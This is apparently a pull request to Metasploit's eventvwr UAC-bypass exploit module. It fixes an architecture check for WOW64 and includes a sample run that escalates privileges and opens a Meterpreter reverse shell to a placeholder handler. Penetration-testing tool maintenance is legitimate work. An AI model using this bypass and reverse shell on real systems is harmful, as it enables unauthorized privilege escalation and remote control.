### PR TITLE
Check only the 1st 3 chars of session architecture

### DIFF
--- a/modules/exploits/windows/local/bypassuac_eventvwr.rb
+++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Make sure we have a sane payload configuration
 
-    if sysinfo['Architecture'] == ARCH_X64
+    if sysinfo['Architecture'][0..2] == ARCH_X64
       # On x64, check arch
       if session.arch == ARCH_X86
         # running WOW64, map the correct registry view


### PR DESCRIPTION
WOW64 execution context returns the proper architecture string,
or rather contains the match at the beginning, followed by a
notice of 32bit execution in the WOW64 context. This breaks
exact matching against the architecture constant, and requires
we check only the 1st 3 characters of the return string to match.

Since there have been recent changes to the ARCH_ constants, it
may be worth while to audit the rest of the code for such checks
since they don't necessarily cause errors, but graceful failure.

Sample run after this fix:

```
(2016-12-07)02:18 msf  exploit(bypassuac_eventvwr) > exploit

[-] Handler failed to bind to 1.1.1.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c
  C:\Windows\System32\eventvwr.exe
[*] Sending stage (1218607 bytes) to 9.9.9.9
[*] Cleaining up registry keys ...
[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 9.9.9.9:52734)
  at 2016-12-07 02:18:43 -0500
```

Note the use of _sysnative\cmd.exe_ for execution...